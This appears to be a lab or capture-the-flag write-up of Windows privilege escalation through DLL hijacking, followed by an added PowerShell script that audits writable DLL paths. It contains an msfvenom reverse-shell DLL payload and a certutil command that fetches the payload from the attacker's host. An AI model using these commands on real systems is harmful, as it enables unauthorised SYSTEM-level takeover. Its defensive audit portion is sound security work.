Privilege Escalation

Upon gaining access to the system, I quickly upgraded my shell using multi/handler and transferred my privilege escalation checkers.

I ran winPEAS but did not come across anything. I then transferred PowerUp.ps1 and came across two ways of getting an administrator shell.

The first path was through an Unquoted Service Path, which I was not able to exploit because I did not have write permissions on the folder I would have needed to write to in order to escalate.

The second path, through DLL hijacking, worked.

We see that there is a writeable DLL in the C:\Python\Scripts\ directory.

How do we exploit this? This DLL is loaded every time the computer starts, so we can replace it with a DLL containing a malicious reverse shell.

msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.49.0 lport=1234 -f dll -o wlbsctrl.dll

I transferred the DLL, overwriting the existing one:

certutil -urlcache -f http://192.168.49.0:80/wlbsctrl.dll "C:\Python\Scripts\wlbsctrl.dll"

I restarted the computer, fired up my listener, and got a reverse shell with NT AUTHORITY\SYSTEM privileges.
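The root cause above is a DLL loaded at boot with privileges that a low-privileged user can replace. The following PowerShell audit is an added example, not part of the original write-up, that reports whether any low-privileged principal holds write, modify or delete rights on a file or its parent directory; the paths checked are the ones from the write-up, and the list of low-privileged principals is an assumption you can extend for your environment.

```powershell
# Added defensive check (not from the original write-up): flag ACL entries
# that let low-privileged principals replace a DLL loaded by a service or
# startup task. Remediation is to remove such grants so that only
# Administrators/SYSTEM can write to the file and its directory.
function Test-WritableByLowPriv {
    param(
        [Parameter(Mandatory)] [string] $Path
    )
    # Assumed set of principals that should never be able to write here
    $lowPriv = @('BUILTIN\Users', 'NT AUTHORITY\Authenticated Users',
                 'Everyone', 'NT AUTHORITY\INTERACTIVE')
    # Any of these rights is enough to overwrite, delete or rename the file
    $writeMask = [System.Security.AccessControl.FileSystemRights]::Write -bor
                 [System.Security.AccessControl.FileSystemRights]::Modify -bor
                 [System.Security.AccessControl.FileSystemRights]::FullControl -bor
                 [System.Security.AccessControl.FileSystemRights]::WriteData -bor
                 [System.Security.AccessControl.FileSystemRights]::Delete

    $acl = Get-Acl -LiteralPath $Path
    $findings = foreach ($ace in $acl.Access) {
        if ($ace.AccessControlType -ne 'Allow') { continue }
        if ($lowPriv -notcontains $ace.IdentityReference.Value) { continue }
        if (($ace.FileSystemRights -band $writeMask) -eq 0) { continue }
        [pscustomobject]@{
            Path      = $Path
            Principal = $ace.IdentityReference.Value
            Rights    = $ace.FileSystemRights
            Inherited = $ace.IsInherited
        }
    }
    return $findings
}

# Check the DLL from the write-up and its parent directory: write access on
# the directory alone is enough to delete and recreate the file.
foreach ($p in 'C:\Python\Scripts\wlbsctrl.dll', 'C:\Python\Scripts') {
    if (Test-Path -LiteralPath $p) {
        $r = Test-WritableByLowPriv -Path $p
        if ($r) { $r | Format-Table -AutoSize }
        else    { "OK: no low-privilege write access on $p" }
    }
}
```

Any row in the output is a finding to fix (for example by removing the grant with `icacls "<path>" /remove:g Users` and re-running the check); the same function can be run over every service binary directory to catch the Unquoted Service Path variant mentioned earlier.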
